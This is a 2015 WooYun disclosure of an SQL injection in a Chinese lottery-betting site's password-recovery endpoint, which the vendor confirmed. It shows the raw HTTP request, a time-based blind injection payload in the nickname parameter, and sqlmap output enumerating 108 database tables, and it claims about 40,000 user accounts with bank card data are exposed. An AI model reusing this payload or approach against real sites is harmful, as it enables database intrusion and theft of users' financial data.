当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142402

漏洞标题:投注网主站存在SQL注入(4W彩民账号信息泄漏)

相关厂商:投注网

漏洞作者: 中央军

提交时间:2015-09-21 22:34

修复时间:2015-11-07 12:06

公开时间:2015-11-07 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

详细说明:

POST /customer/ajax_findpass.php HTTP/1.1
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.touzhu.cn:80/
Cookie: PHPSESSID=7hfbkooam8urame7hfmo3gstd1; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1442677065,1442677097,1442677127,1442677203; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1442677203; HMACCOUNT=38616D555896F654; box_wxts=on; bdshare_firstime=1442675805431
Host: www.touzhu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
actionc=checknickname&nickname=e&suijishu=0.11496315198019147&username=e

nickname参数

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actionc=checknickname&nickname=e' AND (SELECT * FROM (SELECT(SLEEP(5)))MjPa) AND 'WgMi'='WgMi&suijishu=0.11496315198019147&username=e
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
current database:    'caiso'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actionc=checknickname&nickname=e' AND (SELECT * FROM (SELECT(SLEEP(5)))MjPa) AND 'WgMi'='WgMi&suijishu=0.11496315198019147&username=e
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5.0.12
Database: caiso
[108 tables]
+------------------------------+
| activity_activities          |
| activity_activity_detail     |
| activity_cz_jj               |
| admin_channel                |
| admin_class                  |
| admin_friendly_link          |
| admin_help_center            |
| admin_permissions            |
| admin_role                   |
| admin_role_function          |
| admin_syslogs                |
| admin_user                   |
| admin_winprize               |
| business_article             |
| business_article_category    |
| business_article_inlink      |
| business_back_money_request  |
| business_bonus               |
| business_chase               |
| business_chaseitem           |
| business_city_no             |
| business_community           |
| business_company             |
| business_customer            |
| business_customer_commission |
| business_email               |
| business_feedback            |
| business_filedownlod         |
| business_league              |
| business_league_rank         |
| business_match_arrange       |
| business_match_arrange_test  |
| business_match_history       |
| business_match_mapping       |
| business_match_team_mapping  |
| business_mobile              |
| business_odd                 |
| business_order               |
| business_order_queue         |
| business_order_temp          |
| business_part                |
| business_partner             |
| business_pay                 |
| business_pay_out_request     |
| business_payment_request     |
| business_plan                |
| business_plan_item           |
| business_prize_level         |
| business_recharge_gift       |
| business_restricted          |
| business_sms_log             |
| business_sms_mo_log          |
| business_sms_partner         |
| business_soft_update         |
| business_supplier            |
| business_system_param        |
| business_team                |
| business_term                |
| business_term_type_config    |
| business_ticket              |
| business_wallet              |
| business_wallet_log          |
| business_win_describe_order  |
| business_win_describe_ticket |
| business_win_prize           |
| business_you_hui_ma          |
| event_class                  |
| event_code                   |
| event_give                   |
| event_login                  |
| event_oscar2015              |
| event_oscar2015_award        |
| event_oscar2015_items        |
| event_packet                 |
| event_packet_class           |
| event_pay                    |
| odds                         |
| sessions                     |
| sm_queue                     |
| tz_agent                     |
| tz_agent_discount            |
| tz_agent_invite              |
| tz_apppay_temp               |
| tz_balance                   |
| tz_balance_items             |
| tz_checkmobile               |
| tz_config                    |
| tz_discount_plan             |
| tz_discount_plan_items       |
| tz_event_pay                 |
| tz_fetch500_data             |
| tz_focuslist                 |
| tz_indexitems                |
| tz_lottery_date              |
| tz_lotterytype               |
| tz_matchbind                 |
| tz_password_code             |
| tz_sclass                    |
| tz_spend                     |
| tz_spend_tmp                 |
| tz_team                      |
| tz_user_discount             |
| tz_user_money                |
| tz_userlogin                 |
| v_match                      |
| v_matchbind                  |
| v_matchforjcm                |
| v_matchlist                  |
+------------------------------+

4万彩民朋友:

13.png

涉及银行卡号,账号用户名和密码等关键信息:

14.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-23 12:05

厂商回复:

谢谢路大关注.已经转给程序.

最新状态:

暂无